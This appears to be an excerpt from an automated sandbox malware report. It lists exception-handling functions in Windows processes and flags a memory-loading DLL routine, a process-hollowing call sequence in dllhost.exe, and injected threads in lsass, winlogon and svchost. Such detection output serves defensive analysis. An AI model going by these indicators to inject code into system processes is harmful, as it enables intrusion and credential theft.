Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1D3CD80
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1D384B0
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD2CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001B68BD2CD80
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001B68BD284B0
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD28814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000001B68BD28814
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001B68BD5CD80
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_000001B68BD584B0
Source: C:\Windows\System32\cmd.exeCode function: 22_2_000001B68BD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000001B68BD58814
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001E591CCCD80
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001E591CC84B0
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_000001E591CC8814
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E138814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000002234E138814
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E1384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002234E1384B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E13CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002234E13CD80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E168814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_000002234E168814
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E1684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002234E1684B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E16CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_000002234E16CD80
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000023942B1CD80
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_0000023942B18814
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,27_2_0000023942B184B0
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001EF056DCD80
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_000001EF056D8814
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001EF056D84B0
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF0570CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001EF0570CD80
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF05708814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_000001EF05708814
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF057084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_000001EF057084B0
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_000002287AD48814
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002287AD484B0
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_000002287AD4CD80
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA98814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_000001B94DA98814
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA9CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001B94DA9CD80
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_000001B94DA984B0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025202578814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_0000025202578814
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000252025784B0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002520257CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002520257CD80
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00000252025A8814
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000252025A84B0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00000252025ACD80
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_000001A9EBFC8814
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EBFCCD80
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EBFC84B0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EC6884B0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC68CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EC68CD80
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC688814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_000001A9EC688814
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6B84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EC6B84B0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6BCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001A9EC6BCD80
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6B8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_000001A9EC6B8814
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF163CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000019FF163CD80
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF1638814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0000019FF1638814
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF16384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000019FF16384B0
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000019FF19ACD80
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_0000019FF19A84B0
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_0000019FF19A8814

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 35.2.powershell.exe.213141b0000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.VirtualAlloc(PtrAdd(pCode, iMAGE_SECTION_HEADER.VirtualAddress), (UIntPtr)sectionAlignment, AllocationType.COMMIT, MemoryProtection.READWRITE)
Source: 35.2.powershell.exe.213141b0000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.LoadLibrary(PtrAdd(pCode, iMAGE_IMPORT_DESCRIPTOR.Name))
Source: 35.2.powershell.exe.213141b0000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.GetProcAddress(intPtr2, PtrAdd(PtrAdd(pCode, intPtr5), 2))
Source: 35.2.powershell.exe.213141b0000.0.raw.unpack, DLLFromMemory.csReference to suspicious API methods: Win.VirtualProtect(P_0, P_1, P_2, out P_3)
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,14_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: F1EB2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 56A2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7A7D2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 2542EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EBF92EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F1602EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6A172EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 26992EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AB962EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 84182EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 78732EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 5FCF2EBCJump to behavior
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7AD72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25DC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E102EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 98572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CFCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8592EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15D32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B1242EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 82CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 61412EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ADC42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3CB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 997D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2FE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 20425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF652EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8F262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 91C92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4E422EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4B8F2EBC
